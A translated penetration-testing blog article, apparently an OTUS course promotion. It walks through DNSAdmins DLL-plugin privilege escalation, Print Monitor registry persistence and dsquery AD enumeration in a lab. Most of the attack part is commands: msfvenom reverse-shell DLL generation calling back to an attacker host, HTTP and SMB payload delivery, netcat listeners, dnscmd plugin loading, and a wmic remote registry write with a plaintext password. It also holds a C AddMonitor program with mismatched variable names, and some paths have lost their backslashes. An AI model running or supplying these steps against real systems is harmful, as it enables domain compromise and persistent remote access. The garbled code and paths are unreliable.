Flea market for Pentester

The goal of this article is to collect interesting tools, techniques, and commands that can be used to accomplish tasks in penetration testing. A short list of what will be in this article:

  • What’s the matter with DNSAdmins?

  • Persistence

  • Can you do without Bloodhound?

DNSAdmins

Penetration testing for a network running Windows AD services is a fairly common task that a penetration tester faces. To successfully complete it – to find all possible flaws in the configuration and get the maximum rights, you need to check the maximum number of attack vectors.

What’s the matter with DNSAdmins? Let’s say we have a Windows AD infrastructure and we want to grab the user base that is on a domain controller. We will reproduce the situation on a virtual stand. Stand composition:

  • Windows Server 2019 in a standard Windows AD setup, ip address: 192.168.1.172

  • Kali Linux as attack machine, ip address: 192.168.1.3

Stand setup, initial conditions:

  • the attacker gains access to an account that belongs to the DNSAdmins group

  • the victim’s account has remote access enabled via WinRM;

What is DNSAdmins from a Windows AD perspective? Information about this can be found here

The group that is responsible for the functioning of the DNS service. The service is important enough for the entire infrastructure. The fact is that any object that exists in AD will be processed only after a query to the DNS server. Therefore, if the service is compromised, you can make the entire infrastructure work as the attacker wants. The most devastating attacks can be MiTM attacks, which can be carried out if the DNS service uses an incorrectly configured IPv6 network interface. For those interested in this attack, you can read the details here.

But what are we going to use? Today we will pay attention to how the DNS service works with a special mechanism, which is described hereas a mechanism for processing events and sequences. The mechanism allows you to use various functions of the server from RPC mechanisms to access to the database of DNS records. In all this data, we are interested in processing R_DnssrvOperation… This is an old feature that allows DNSAdmin users to load a DLL into service process memory. This library does not pass the validation mechanism and therefore you can try to use it to get the maximum privileges on the system.

The attack is carried out in several stages:

  • Dll library generation. In this step, we will use msfvenom. It is better to generate payload, which will use the most lightweight and simple shell. In our case it is windows/shell/reverse_tcp. The command to generate is as follows:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f dll -o test.dll

We will deliver the library through the http server. On a Kali machine, you can use the following command from the directory where the generated library is located:

python3 -m http.server 7979

  • Download the library to the workstation of the DNSAdmin user of the group. In our case, this is user test3. This can be done, for example, through the command in Powershell:

Invoke-WebRequest -URI "http://192.168.1.3:7979/test.dll -OutFile "C:Userstest2Desktoptest.dll"

  • We start the listener. You can use the module exploit/multi/handler… Having previously configured it, something like this:

nc -lvp 4444

  • We launch the attack on the victim’s machine. For this stage, you need to get data about the user’s password:

dnscmd.exe /config /serverlevelplugindll C:UsersTest2Desktoptest.dll
sc stop dns
sc start dns

As a result, we check the privileges in the resulting shell:

Persistence

After gaining access to the system, it is not always possible to make stable access. Using automation techniques for penetration testing can lead to various consequences. From failure of the tested system to reboot. To be able to access again and do it automatically, you can use pinning mechanisms.

Docking is usually done at the expense of places in the OS that are used to automatically launch commands and applications. As a rule, these are system applications or services. Let’s consider one of them.

Adding your own dll to the registry key HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlPrintMonitors

The method uses the “Windows Print Spooler” mechanism. This mechanism, when the system starts, starts the monitor, which is specified in the registry value of the same name. Since the launch is performed on behalf of the “System” user, the corresponding privileges are obtained there. For the convenience of using the mechanism, you can write to the registry not a file from a local directory, but an SMB ball.

Method step by step:

  • Create dll:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.3 LPORT=6666 -f dll -o test.dll

  • open listener on Kali Linux:

sudo nc -lvvp 6666

  • share for dll access:

smbserver.py -smb2support test /root

  • add dll to the registry:

wmic /node:192.168.1.10 /user:"labtest2" /password:Qwerty!@ process call create "reg add "HKLMSystemCurrentControlSetControlPrintMonitorsSlayer" /v "Driver" /d "\192.168.1.3testtest.dll" /t REG_SZ"

  • reboot the OS and gain access to the system.

The method can also be implemented by executing a file on behalf of the administrator, which will be compiled from this source:

#include <windows.h>

int main()
{
    MONITOR_INFO_2 mon;
    TCHAR name[14] = TEXT("MonitorSlayer");
    TCHAR arch[12] = TEXT("Windows x64");
    TCHAR dll[39] = TEXT("\\192.168.1.3\test\test.dll");
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = arch;
    monitorInfo.pDLLName = dll;

    AddMonitor(NULL, 2, (LPBYTE)&mon);
    return 0;
}

Try now to access the SMB share. And run any command from there.

Can you do without Bloodhound?

Bloodhound – a tool for obtaining information about the infrastructure managed by Windwos AD. Allows you to collect information that can be used to find special privileges that allow you to compromise the system.

The tool works on all known mechanisms for collecting infrastructure data:

  • ldap

  • kerberos

  • SMB

  • DCOM

  • RPC

Requests are formed taking into account those needs that were requested by the user. Additionally, the tool is capable of collecting information about active user sessions on machines.

The tool is pretty useful, but what if we don’t need to run so many commands and only want to collect point information about AD? Can you do the same? In fact, yes, but you need to be able to use the tools to collect information. We will consider the dnsquery.exe tool. This tool comes with a dedicated RSAT toolkit. By the way, sending requests is possible only if the session is used on behalf of “System”.

The scheme of using the tool is as follows:

dsquery <тип объекта> <фильтры> <опции>

Object types:

WildCard Computer Contact Group OU Site Server User Quota Partition

An example of issuing a request to search for users:

An example of issuing a request to search for groups:

In this way, you can collect information about Windows AD objects. The rest of the tests are offered to the reader to perform independently

The article was prepared by OTUS expert – Alexander Kolesnikov on the eve of the start of the course “Pentest. Practice of Penetration Testing”

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *